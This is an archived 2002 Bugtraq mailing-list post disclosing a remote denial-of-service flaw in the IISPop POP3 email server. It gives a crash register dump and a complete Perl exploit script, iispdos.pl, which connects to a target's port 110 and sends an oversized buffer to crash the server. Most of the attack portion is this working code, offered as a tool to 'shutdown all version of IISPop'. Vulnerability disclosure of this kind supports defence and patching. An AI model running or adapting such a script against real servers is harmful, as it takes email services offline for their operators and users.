[27879] in bugtraq
IISPop remote DOS
daemon@ATHENA.MIT.EDU (securma massine)
Fri Nov 15 15:15:23 2002
From: securma massine <securma@caramail.com>
To: bugtraq@securityfocus.com
Message-ID: <1037272315023222@caramail.com>
Mime-Version: 1.0
Date: Thu, 14 Nov 2002 12:11:55 GMT+1
Content-Type: multipart/mixed; boundary="=_NextPart_Caramail_0232221037272315_ID"
--=_NextPart_Caramail_0232221037272315_ID
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
hi
The IISPop EMail Server (http://www.curtiscomp.com/)was
designed for small networks,This is a POP3 only server,
designed to be paired with the SMTP server bundled in
Windows 2000/IIS 5.
I have found that IISpop is vulnerable has a attack DOS
caused by sends of a broad buffer (289999 byte) this attack
gives the following state of the registers (tested on v
1.161 end 1.181)
Access violation - code c0000005 (first chance)
eax=3D00000041 ebx=3D00407d3d ecx=3D00000101 edx=3D000021ae
esi=3D0040693d edi=3D00437181
eip=3D77e76941 esp=3D0112ffb0 ebp=3D0000026c iopl=3D0 nv up
ei pl nz na po nc
cs=3D001b ss=3D0023 ds=3D0023 es=3D0023 fs=3D0038
gs=3D0000 efl=3D00000206
KERNEL32!GetCurrentThreadId+4:
77e76941 0000 add [eax],al
ds:0023:00000041=3D??
(unhandled exeption in IISPop.exe (KRNELL32.DLL)
0xc0000005 : access violation
exploit:
#!/usr/bin/perl -w
# tool : iispdos.pl
# shutdown all version of IISPop
# greetz crack.fr , marocit ,christal
#
use IO::Socket;
$ARGC=3D@ARGV;
if ($ARGC !=3D1) {
print "\n-->";
print "\tUsage: perl iispdos.pl <host> \n";
exit;
}
$remo =3D $ARGV[0];
$buffer =3D "A" x 289999;
print "\n-->";
print "\tconnection with $remo\n";
unless ($so =3D IO::Socket::INET->new (Proto =3D> "TCP",
PeerAddr =3D> $remo,
PeerPort
=3D> "110"))
{
print "-->";
print "\tConnection Failed...\n";
exit;
}
print $so "$buffer\n";
close $so;
print "-->";
print "\tnow test if the distant host is down\n";
exit;
_________________________________________________________
Gagne une PS2 ! Envoie un SMS avec le code PS au 61166
(0,35€ Hors co=FBt du SMS)
--=_NextPart_Caramail_0232221037272315_ID--
